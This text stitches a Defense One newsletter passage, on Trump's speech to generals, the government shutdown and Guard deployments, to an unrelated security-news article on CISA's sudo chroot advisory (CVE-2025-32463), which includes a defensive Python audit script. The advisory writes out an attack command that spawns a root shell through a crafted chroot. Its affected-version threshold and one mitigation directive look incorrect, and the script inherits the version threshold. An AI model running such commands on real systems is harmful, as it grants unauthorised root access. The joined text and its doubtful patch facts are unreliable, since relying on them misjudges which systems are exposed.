    Trump then launched into a speech that wandered among some of his favorite recent topics, including his desire for the Nobel Peace Prize; the Gulf of Mexico; how Democrats are “a lot of bad people”; how “everyone loves my signature”; how he thinks he’s ended eight wars; his desire to make Canada the 51st state; how he believes the U.S. Navy uses “ugly ships” and “I think we should maybe start thinking about battleships”; that he thinks the U.S. is being invaded “from within”; his stated belief that Washington, D.C., is more dangerous than Afghanistan; how he’s ordered U.S. troops to occupy American cities and how that’s “gonna be a major part for some people in this room”; and relatedly, how he thinks “we should use some of these dangerous [U.S.] cities as training grounds for our military.” 

    One lingering question: Was this in-person meeting necessary? After all, “The military is well-equipped to hold meetings online in a secure fashion,” former Justice Department attorney for the Northern District of Alabama Joyce Vance wrote Monday evening. 

    Reaction from Capitol Hill: 

    • “He billed the taxpayers millions to fly every general to Washington to hear this weirdo drivel,” said Sen. Chris Murphy, D-Conn., writing on social media Tuesday. (One recent estimate put the costs somewhere between three and six million dollars.) Also, “He's telling us what he's doing. Using the military to suppress protest,” Murphy added.
    • “We need a Defense Secretary focused on fighting real wars instead of culture wars,” said Delaware Democratic Sen. Chris Coons.
    • “America’s military leadership has more important things to do than listen to lectures on character from an unqualified drunk who assaults women,” said Virginia Democratic Rep. Don Beyer. “Any soldier who was as careless as Hegseth was with war plans would be fired if not prosecuted. And everyone in that room knows it.”

    Commentary from a retired Air Force one-star: “Defense Secretary Pete Hegseth’s short-notice, no-explanation summoning of more than 800 general and flag officers from command positions around the world demonstrates a lack of respect for their time and their jobs. It suggests a concomitant lack of respect for their advice”—and that endangers “the civilian-military dialogue, the military itself, and the country.” Read Paula Thornhill’s argument, here.

    One last note: Trump and Hegseth’s forthcoming national defense strategy has raised “serious concerns” among top Pentagon officers, including the chairman of the Joint Chiefs of Staff, Gen. Dan Caine, the Washington Post reported Monday evening. 

    In particular, Trump and Hegseth’s focus “on perceived threats to the homeland, narrowing U.S. competition with China, and downplaying America’s role in Europe and Africa” has fostered a “growing sense of frustration with a plan they consider myopic and potentially irrelevant, given the president’s highly personal and sometimes contradictory approach to foreign policy,” four Post reporters write. Read more (gift link), here.

    Welcome to this Tuesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1954, the USS Nautilus submarine was commissioned as the world's first nuclear-powered vessel.

    Shutdown watch

    Read the Defense Department’s shutdown guidance, here. TLDR: Just over 400,000 of DOD’s 741,477 civilian employees will be kept on the job, either because they are “[n]ecessary to protect life and property” or because their salaries are not funded through regular appropriations acts.

    Noted: DOD officials had been unable to provide the current number of DOD civilians when asked about it last week; they declined to provide details about Hegseth’s ongoing efforts to cut the workforce.

    Latest: “All signs point to the government shutting down at midnight Tuesday night,” Politico posted at 8 a.m. on Tuesday. “Just when Monday’s meeting between President Donald Trump and congressional leaders brought a glimmer of a potential offramp—the president expressed openness to extending Obamacare credits, Democrats’ asking price—it was back to the status quo hours later.

    Trump posted a deepfake video Monday night of Senate Minority Leader Chuck Schumer talking about why voters hate Democrats and House Minority Leader Hakeem Jeffries in a sombrero and mustache, which Jeffries called bigoted. Now, just 16 hours until the deadline, there’s no reason to expect a breakthrough. And leaders haven’t set a follow-up meeting on the impasse.” Read on, here.

    Charted: Congress’ struggle to fund the government, in concise yet detailed graphs and text, from the New York Times, here.

    Related reading: “Shutdown could erode cyber defenses by sidelining critical staff, experts warn,” Nextgov reported Monday.

    Workforce cuts to take effect today: “This week marks the largest single-year exodus of federal US employees in almost 80 years,” Reuters writes. That’s because the delayed resignations of more than 100,000 federal workers, part of the Trump administration’s effort to shrink the federal workforce, take effect tonight.

    DOD workers account for the lion’s share of workers taking buyouts or early retirement: more than 61,000, officials told Defense One’s Meghann Myers last week.

    Historian’s take: “This year’s cuts to the government workforce will mean the loss of at least 275,000 workers, the largest decline in civilian federal employment in a single year since World War II,” Boston College’s Heather Cox Richardson wrote Monday.

    Troops in U.S. streets

    As armed, masked agents patrol downtown Chicago, Illinois governor says National Guard troops could be next. AP: “Trump has waffled on sending the military, but Democratic Gov. JB Pritzker said Monday it appeared the federal government would deploy 100 troops. Pritzker said the Illinois National Guard received word that the Department of Homeland Security sent a memo to the Defense Department requesting troops to protect ICE personnel and facilities.”

    AP’s article also offers “a snapshot of where things stand with federal law enforcement activity in Chicago, Portland, Memphis and New Orleans.” Read more, here.

    Louisiana’s Gov. Jeff Landry: “Tonight, we're sending the Department of War a request to send the National Guard, asking them to deploy the National Guard here in Louisiana into our cities like New Orleans and Baton Rouge and others,” the Republican governor said Monday night on Fox TV. 

    Reminder: Landry does not need authorization to activate his own National Guard. He’s in charge of the force. 

    In Oregon: A judge set a Friday hearing for the state’s argument to block Trump’s deployment of National Guard troops, the Oregon Capital Chronicle reported Monday. In the meantime, Sen. Ron Wyden, D-Ore., “who has led the push to force the Treasury to turn over Epstein-related Treasury records of at least $1.5 billion in suspicious transactions to Senate investigators—posted a video of the ICE facility Trump claims is under siege. There were no people there at all,” Richardson wrote.

    Around the world

    Trump secured Netanyahu’s agreement to a Gaza plan that would make the U.S. president the temporary chairman of a board in charge of the redevelopment of the seaside Palestinian territory, the New York Times reported off the leaders’ Monday meeting.

    However, it’s far from clear that Hamas will agree to the plan, although Trump said he would back further Israeli war in Gaza if the group declines. More, here.

    The far-right digital network Black Sun Rising Militia planned to paralyze Europe in a coordinated attack on synagogues, mosques and several Swedish media houses last year, reports SVT Nyheter, the news arm of Swedish public television, after the conviction in Brazil of the network’s leader, a 35-year-old American who had been recruiting people in the Nordic countries on social media. A bit more, here.

    Lastly today: “FBI boss Kash Patel gave New Zealand officials 3D-printed guns illegal to possess under local laws,” AP reported on Tuesday, during his July visit to the country. More on that situation, and the diplomatic discomfort caused by Patel’s remarks on China, here.

  • CISA has issued an urgent advisory regarding a critical vulnerability in the Linux and Unix sudo utility, CVE-2025-32463, that is currently being exploited in the wild.

    This flaw allows local adversaries to bypass access controls and execute arbitrary commands as the root user, even without explicit sudoers privileges.

    Sudo Chroot Bypass (CVE-2025-32463)

    Identified as “Inclusion of Functionality from Untrusted Control Sphere,” CVE-2025-32463 stems from improper validation in the handling of the -R (--chroot) option. 

    When invoked as sudo -R /path/to/chroot command, the utility fails to verify that the target directory is secure. An attacker can craft a malicious chroot environment under their control, often in a directory they own, to trick sudo into executing code with elevated privileges. 

    The weakness is catalogued under CWE-829 (Inclusion of Functionality from Untrusted Control Sphere).

    Exploit scenarios include:

    • a local user creating a directory with manipulated symbolic links and configuration files;
    • running sudo -R attacker_dir /bin/sh to spawn a root shell regardless of sudoers restrictions;
    • integration into post-exploitation toolkits, enabling full system takeover.

    While there are no confirmed reports of integration in known ransomware campaigns to date, the severity of an unprivileged local user gaining root access cannot be overstated. 

    CISA has set a remediation due date of 2025-10-20 for the vulnerability. Systems left unpatched risk complete compromise of confidentiality, integrity, and availability.

    Risk Factors           | Details
    Affected Products      | Sudo versions prior to 1.9.14p2 on Linux/Unix
    Impact                 | Local privilege escalation—attacker gains root shell
    Exploit Prerequisites  | Ability to create a malicious chroot directory
    CVSS 3.1 Score         | 9.3 (Critical)

    Mitigations

    Organizations running any sudo version older than the patched releases must act immediately:

    • Update to the latest sudo release as detailed in the Sudo project advisory.
    • If patches cannot be deployed, disable the -R option by adding Defaults !use_chroot to /etc/sudoers.
    • For cloud and managed services, follow binding operational directives to ensure secure configuration baselines.
    • Scan systems for unusual chroot usage patterns and review logs for sudo invocations that reference untrusted directories.
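    As an added example (not code from the CISA alert, the Sudo project, or this article), the following Python audit covers the first and last mitigations above: it compares an installed sudo version string against the fixed release the article names, and it scans syslog-style sudo log lines for -R invocations whose chroot target lies outside an allow-list of expected chroot roots. The CHROOT= field name in the log layout, the sample log lines, and the trusted-root list are assumptions constructed for this example; adjust the allow-list to your own baseline and the version threshold to your vendor's advisory.

```python
import os
import re

# Fixed release as stated in the advisory text above; anything older is treated
# as vulnerable. (Version figure taken from the article, not verified here.)
FIXED_VERSION = "1.9.14p2"

# Directories under which sudo -R chroots are expected on this host. This is a
# constructed allow-list for the example; tailor it to your own baseline.
TRUSTED_CHROOT_ROOTS = ["/srv/chroot", "/var/lib/chroots"]

# Constructed sample log lines in the syslog-style layout sudo writes, with a
# CHROOT= field present when -R was used (assumed field name for this example).
SAMPLE_LOG_LINES = [
    "Sep 30 09:14:02 host1 sudo:    alice : TTY=pts/0 ; CHROOT=/srv/chroot/build ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/make",
    "Sep 30 09:15:44 host1 sudo:      bob : TTY=pts/1 ; CHROOT=/tmp/bob_chroot ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh",
    "Sep 30 09:16:10 host1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update",
    "Sep 30 09:17:30 host1 sshd[1234]: Accepted publickey for alice from 10.0.0.5 port 51234",
]


def parse_sudo_version(text):
    """Turn '1.9.14p2' into a comparable tuple (1, 9, 14, 2).

    A release without a 'pN' suffix gets patch level 0, so 1.9.15 > 1.9.14p2.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version string: {text!r}")
    major, minor, micro, patch = m.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def is_vulnerable_version(installed):
    """True when the installed sudo is older than the fixed release."""
    return parse_sudo_version(installed) < parse_sudo_version(FIXED_VERSION)


# "<prefix> sudo: <user> : KEY=VALUE ; KEY=VALUE ; ..." (assumed layout)
SUDO_LINE = re.compile(r"\bsudo:\s+(?P<user>\S+)\s*:\s*(?P<fields>.*)$")


def parse_sudo_log_line(line):
    """Return the ' ; '-separated KEY=VALUE fields of a sudo log line as a dict, or None."""
    m = SUDO_LINE.search(line)
    if not m:
        return None
    fields = {"user": m.group("user")}
    for part in m.group("fields").split(" ; "):
        key, sep, value = part.partition("=")
        if sep:  # free-text parts such as 'command not allowed' carry no '='
            fields[key.strip()] = value.strip()
    return fields


def chroot_is_trusted(chroot, trusted_roots):
    """A chroot target is trusted only if it is absolute and under an allow-listed root."""
    if not chroot.startswith("/"):
        return False  # relative targets such as 'attacker_dir' resolve under the caller's CWD
    path = os.path.normpath(chroot)  # collapses '..' so '/srv/chroot/../../tmp' is caught
    for root in trusted_roots:
        root = os.path.normpath(root).rstrip("/")
        if path == root or path.startswith(root + "/"):
            return True
    return False


def audit_sudo_log(lines, trusted_roots):
    """Flag every sudo invocation whose CHROOT= target lies outside the trusted roots."""
    findings = []
    for line in lines:
        fields = parse_sudo_log_line(line)
        if not fields or "CHROOT" not in fields:
            continue
        if not chroot_is_trusted(fields["CHROOT"], trusted_roots):
            findings.append({
                "user": fields["user"],
                "chroot": fields["CHROOT"],
                "command": fields.get("COMMAND", ""),
                "line": line,
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_log(SAMPLE_LOG_LINES, TRUSTED_CHROOT_ROOTS):
        print(f"untrusted chroot: user={f['user']} chroot={f['chroot']} command={f['command']}")
    for v in ("1.9.13", "1.9.14p1", "1.9.14p2", "1.9.15"):
        print(f"sudo {v}: {'VULNERABLE' if is_vulnerable_version(v) else 'patched'}")
```

    On a live host, feed audit_sudo_log the lines from /var/log/auth.log or journalctl output for the sudo unit, and feed is_vulnerable_version the first line of sudo --version after stripping the "Sudo version " prefix. Treating any relative chroot target as untrusted matters because the article's attacker_dir scenario is exactly a user-owned relative path.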

    CISA’s alert highlights the importance of vigilant patch management and ongoing monitoring. Administrators should verify compliance with vendor instructions or discontinue vulnerable implementations where mitigations are unavailable. 

    Failure to address this vulnerability by the 2025-10-20 deadline may result in unauthorized root access, data breaches, or system-wide compromise.

    The post CISA Warns of Linux Sudo Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.
